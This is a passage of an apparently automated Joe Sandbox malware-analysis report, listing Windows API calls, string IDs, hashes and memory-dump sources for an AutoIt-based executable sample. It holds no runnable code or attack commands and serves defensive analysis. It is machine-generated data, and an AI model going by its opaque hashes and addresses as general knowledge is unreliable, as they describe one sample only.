                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 037a6ad5266ea50d0875b316c5b9d6bcc204af06020ead2775ddf7e9a99b99ca
                                                            • Instruction ID: 891188e79247d162e1be7245106f99412ab7af1842c2356175ce711e1726a1b8
                                                            • Opcode Fuzzy Hash: 037a6ad5266ea50d0875b316c5b9d6bcc204af06020ead2775ddf7e9a99b99ca
                                                            • Instruction Fuzzy Hash: 3581F6B1640219BBCB20BB61DC52FBF7768AF15740F044026FE49AB2D2EB71DA45E271
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D58AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D58AD2
                                                            • CharNextW.USER32(0000014E), ref: 00D58B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D58B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D58B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D58B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D58B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00D58BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D58BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D58C1F
                                                            • _memset.LIBCMT ref: 00D58C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D58C8D
                                                            • _memset.LIBCMT ref: 00D58CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D58D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D58D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00D58E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D58E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D58E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D58EB4
                                                            • DrawMenuBar.USER32(?), ref: 00D58EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00D58EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0$@U=u
                                                            • API String ID: 1073566785-975001249
                                                            • Opcode ID: 2fe4ca5a37b65aa5b27502e1aac7cf2c5fe1639bf33023dcf1dae0ee4ec44139
                                                            • Instruction ID: b42b4f9d719d88c4cb649b1b70785eaf1c71f6d6a4fe65965b1d3ec67fe2c321
                                                            • Opcode Fuzzy Hash: 2fe4ca5a37b65aa5b27502e1aac7cf2c5fe1639bf33023dcf1dae0ee4ec44139
                                                            • Instruction Fuzzy Hash: 39E15D70900258EBDF209F54CC84EEE7BB9EF09712F148156FD55AA290DB708A88EF71
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00D549CA
                                                            • GetDesktopWindow.USER32 ref: 00D549DF
                                                            • GetWindowRect.USER32(00000000), ref: 00D549E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D54A48
                                                            • DestroyWindow.USER32(?), ref: 00D54A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D54A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D54ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D54AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00D54AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D54B09
                                                            • IsWindowVisible.USER32(?), ref: 00D54B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D54B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D54B58
                                                            • GetWindowRect.USER32(?,?), ref: 00D54B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00D54B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00D54BB0
                                                            • CopyRect.USER32(?,?), ref: 00D54BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00D54C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: c66953ff41f985cd16d885c0936c9d25c992dd381cfefbaf162f395179fa6329
                                                            • Instruction ID: 302984e5a6f39d13ac2ee290b8377ccf90cca8059bc247e58d45368bd187c498
                                                            • Opcode Fuzzy Hash: c66953ff41f985cd16d885c0936c9d25c992dd381cfefbaf162f395179fa6329
                                                            • Instruction Fuzzy Hash: 06B18A70604340AFDB44DF64C849B6ABBE4FF88319F04891DFD999B2A1D770E849CB66
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00D344AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00D344D2
                                                            • _wcscpy.LIBCMT ref: 00D34500
                                                            • _wcscmp.LIBCMT ref: 00D3450B
                                                            • _wcscat.LIBCMT ref: 00D34521
                                                            • _wcsstr.LIBCMT ref: 00D3452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D34548
                                                            • _wcscat.LIBCMT ref: 00D34591
                                                            • _wcscat.LIBCMT ref: 00D34598
                                                            • _wcsncpy.LIBCMT ref: 00D345C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: fdf4ed863bef472cc1ed72c83d0e632c60f6c7e738a1be8f989f794338deaeb2
                                                            • Instruction ID: 633a4c50e931f9f636b937127480cf72d73a2b0ea6c8af110a771b424a4e1921
                                                            • Opcode Fuzzy Hash: fdf4ed863bef472cc1ed72c83d0e632c60f6c7e738a1be8f989f794338deaeb2
                                                            • Instruction Fuzzy Hash: 5E41F571A402087BDB50AB748C07EFF776CDF45710F54006AFA05E6182EB74AA05A6B6
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CD28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 00CD28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CD28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 00CD28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 00CD291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CD2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00CD2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CD297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CD2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00CD29AE
                                                            • GetStockObject.GDI32(00000011), ref: 00CD29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD29D5
                                                              • Part of subcall function 00CD2344: GetCursorPos.USER32(?), ref: 00CD2357
                                                              • Part of subcall function 00CD2344: ScreenToClient.USER32(00D957B0,?), ref: 00CD2374
                                                              • Part of subcall function 00CD2344: GetAsyncKeyState.USER32(00000001), ref: 00CD2399
                                                              • Part of subcall function 00CD2344: GetAsyncKeyState.USER32(00000002), ref: 00CD23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00CD1256), ref: 00CD29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: @U=u$AutoIt v3 GUI
                                                            • API String ID: 1458621304-2077007950
                                                            • Opcode ID: a0f3993bfaefa655e524fbca09ac6a57b228b7e1245aba887bff28b7a777f521
                                                            • Instruction ID: 4ffc3ef4af18d7843f5a235f3973599bc34711e5271dc53dd79ca41c6ddb1cfc
                                                            • Opcode Fuzzy Hash: a0f3993bfaefa655e524fbca09ac6a57b228b7e1245aba887bff28b7a777f521
                                                            • Instruction Fuzzy Hash: A1B13971A0030AEFDB15DFA8DC45BAA7BA5FB18311F10422AFA15EB390DB749941DB60
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00D5BA56
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00D5BA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00D5BA78
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D5BA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 00D5BA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00D5BA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00D5BAA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D5BAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00D5BABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D62CAC,?), ref: 00D5BAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D5BAE7
                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00D5BB0B
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00D5BB36
                                                            • DeleteObject.GDI32(00000000), ref: 00D5BB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D5BB74
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID: @U=u
                                                            • API String ID: 3840717409-2594219639
                                                            • Opcode ID: a2a074a6187168df2658513e4aa75e7dcc83c91402b32790329708203ca4ef76
                                                            • Instruction ID: 9d685b216db9e4d510947079640c07246ddf445fb448bccfc392d92ffc19046a
                                                            • Opcode Fuzzy Hash: a2a074a6187168df2658513e4aa75e7dcc83c91402b32790329708203ca4ef76
                                                            • Instruction Fuzzy Hash: E2410775600308EFDB119F65DC88EABBBB9EB89722F144069FD19DB260D7709905CB70
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00D2A47A
                                                            • __swprintf.LIBCMT ref: 00D2A51B
                                                            • _wcscmp.LIBCMT ref: 00D2A52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D2A583
                                                            • _wcscmp.LIBCMT ref: 00D2A5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00D2A5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 00D2A648
                                                            • GetWindowRect.USER32(?,?), ref: 00D2A67E
                                                            • GetParent.USER32(?), ref: 00D2A69C
                                                            • ScreenToClient.USER32(00000000), ref: 00D2A6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00D2A71D
                                                            • _wcscmp.LIBCMT ref: 00D2A731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00D2A757
                                                            • _wcscmp.LIBCMT ref: 00D2A76B
                                                              • Part of subcall function 00CF362C: _iswctype.LIBCMT ref: 00CF3634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: b83050bb018056880c1dc4e99069d2f21086cde9ba60f39df4633a1ee72bdc8e
                                                            • Instruction ID: 420034f1b2a35c36e1730eef62660789c055c43503cf3048d58e8823c6fd4735
                                                            • Opcode Fuzzy Hash: b83050bb018056880c1dc4e99069d2f21086cde9ba60f39df4633a1ee72bdc8e
                                                            • Instruction Fuzzy Hash: 3EA1EF31204726AFC714DF68D884BAAB7E8FF64309F048529F999C7190DB30E945CBB2
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00D2AF18
                                                            • _wcscmp.LIBCMT ref: 00D2AF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00D2AF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00D2AF6E
                                                            • _wcscmp.LIBCMT ref: 00D2AF8C
                                                            • _wcsstr.LIBCMT ref: 00D2AF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D2AFD5
                                                            • _wcscmp.LIBCMT ref: 00D2AFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00D2B00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D2B055
                                                            • _wcscmp.LIBCMT ref: 00D2B065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00D2B08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 00D2B0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: faaf1fb6da4cef7d11042b39c979314d30a77f9e75ad1404642cba01f096c317
                                                            • Instruction ID: dcccc543187134140001e7dc4bfa81dca2ba0c689806bbb0f7d3ce1caa9a0f25
                                                            • Opcode Fuzzy Hash: faaf1fb6da4cef7d11042b39c979314d30a77f9e75ad1404642cba01f096c317
                                                            • Instruction Fuzzy Hash: 8E81E0710083159FDB01DF14D985FAA77E8EFA4328F08846AFD858A095DB74DD49CBB2
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5A259
                                                            • DestroyWindow.USER32(?,?), ref: 00D5A2D3
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D5A34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D5A36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D5A382
                                                            • DestroyWindow.USER32(00000000), ref: 00D5A3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00CD0000,00000000), ref: 00D5A3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D5A3F4
                                                            • GetDesktopWindow.USER32 ref: 00D5A40D
                                                            • GetWindowRect.USER32(00000000), ref: 00D5A414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D5A42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D5A444
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$@U=u$tooltips_class32
                                                            • API String ID: 1297703922-1130792468
                                                            • Opcode ID: 33417757c8ae6994f8ca6ea758d85061e27c2370c0cda27b2a0156977f6bf7d4
                                                            • Instruction ID: 88de6f8f47e48bf0fbe8dfe2566fe3eec808e0e44076a155465a430818d77d31
                                                            • Opcode Fuzzy Hash: 33417757c8ae6994f8ca6ea758d85061e27c2370c0cda27b2a0156977f6bf7d4
                                                            • Instruction Fuzzy Hash: 42715870140305AFDB25CF68CC49F6A7BE5EB88705F08462DFD858B2A0D771A90ACB62
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 00D5C627
                                                              • Part of subcall function 00D5AB37: ClientToScreen.USER32(?,?), ref: 00D5AB60
                                                              • Part of subcall function 00D5AB37: GetWindowRect.USER32(?,?), ref: 00D5ABD6
                                                              • Part of subcall function 00D5AB37: PtInRect.USER32(?,?,00D5C014), ref: 00D5ABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D5C690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D5C69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D5C6BE
                                                            • _wcscat.LIBCMT ref: 00D5C6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D5C705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D5C71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D5C735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D5C757
                                                            • DragFinish.SHELL32(?), ref: 00D5C75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D5C851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                            • API String ID: 169749273-762882726
                                                            • Opcode ID: 2ff4f9d489c5107e74a37e1831a55be84d3dfec3801d19e19e49351ba2d899a6
                                                            • Instruction ID: a263931741c2cb02582a146b93b240d168e2c46592398981886511a4a422936b
                                                            • Opcode Fuzzy Hash: 2ff4f9d489c5107e74a37e1831a55be84d3dfec3801d19e19e49351ba2d899a6
                                                            • Instruction Fuzzy Hash: F4616271108300AFCB01EF54DC85DAFBBF8EF89751F00092EFA95962A1DB719949DB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 5c90ef5e9e294ab1f3cdbba565566f198465ab2c7cbc239f9309b2719a667b67
                                                            • Instruction ID: 60200c40e00b98cbc2cc70ff3bc37bca7bcfed385b1258337e5fb5323994a7fa
                                                            • Opcode Fuzzy Hash: 5c90ef5e9e294ab1f3cdbba565566f198465ab2c7cbc239f9309b2719a667b67
                                                            • Instruction Fuzzy Hash: 2E31E434948219ABCA14FB64EE43EBE7764EF20754F30011AF555711D1FF21AF08A6B2
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00D45013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00D4501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00D45029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00D45034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00D4503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00D4504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00D45055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00D45060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00D4506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00D45076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00D45081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00D4508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00D45097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00D450A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00D450AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00D450B8
                                                            • GetCursorInfo.USER32(?), ref: 00D450C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
